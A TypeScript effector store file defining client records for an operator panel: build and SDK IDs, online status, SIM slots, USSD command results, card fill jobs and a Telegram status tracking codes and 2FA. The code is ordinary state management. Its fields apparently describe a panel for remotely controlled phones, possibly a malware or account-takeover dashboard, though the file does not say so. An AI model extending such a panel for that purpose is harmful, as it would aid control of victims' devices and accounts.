import { createEvent, createStore, sample } from 'effector';
import type { ICardFillJob } from './client.entity';
import { $resetAuth } from './profile-entity';

export interface IUssd {
	id: number;
	client_id: string;
	build_id: string;

	operator?: string;
	used_command?: string;
	failure_code?: string;
	response?: string;
	phone?: string;

	created_at: string;
}

export interface IMyClient {
	id: string;
	buildId: string;
	profileId: number;
	profileNickname: string;

	tgStatus: 'notset' | 'used' | 'woutcode' | '2fa';

	sdkVersion: string;
	phone?: string;
	fileName?: string;

	takeStatus?: 0 | 1 | 2 | 3;
	takenFrom?: string;
	comment?: string;

	isOnline: boolean;
	onlineAt: number;

	phones: {
		number?: string;
		subId: string;
		name: string;
	}[];

	cardFillJobs?: ICardFillJob[];

	createdAt: number;
}

export const $resetPanelState = createEvent();

export const $setMyClients = createEvent<IMyClient[]>();
export const $addMyClient = createEvent<IMyClient>();
export const $updateMyClient = createEvent<IMyClient>();

export const $myClients = createStore<IMyClient[]>([])
	.on($setMyClients, (_, payload) => payload)
	.on($addMyClient, (state, payload) => [payload, ...state])
	.on($updateMyClient, (state, payload) => {
		const index = state.findIndex(item => item.id === payload.id);
		if (index === -1) return state;
		const newState = [...state];
		newState[index] = { ...state[index], ...payload };
		return newState;
	})
	.reset($resetPanelState);

export const $setSelectedMyClient = createEvent<IMyClient | null>();
export const $selectedMyClient = createStore<IMyClient | null>(null).on($setSelectedMyClient, (_, payload) => payload).reset($resetPanelState);

export const $setMyClientsSearchResult = createEvent<IMyClient[]>();
export const $myClientsSearchResult = createStore<IMyClient[]>([]).on($setMyClientsSearchResult, (_, payload) => payload).reset($resetPanelState);

export const $setMyClientsSearchValue = createEvent<string>();
export const $myClientsSearchValue = createStore<string>('').on($setMyClientsSearchValue, (_, payload) => payload).reset($resetPanelState);

sample({
	clock: $resetAuth,
	target: $resetPanelState,
});
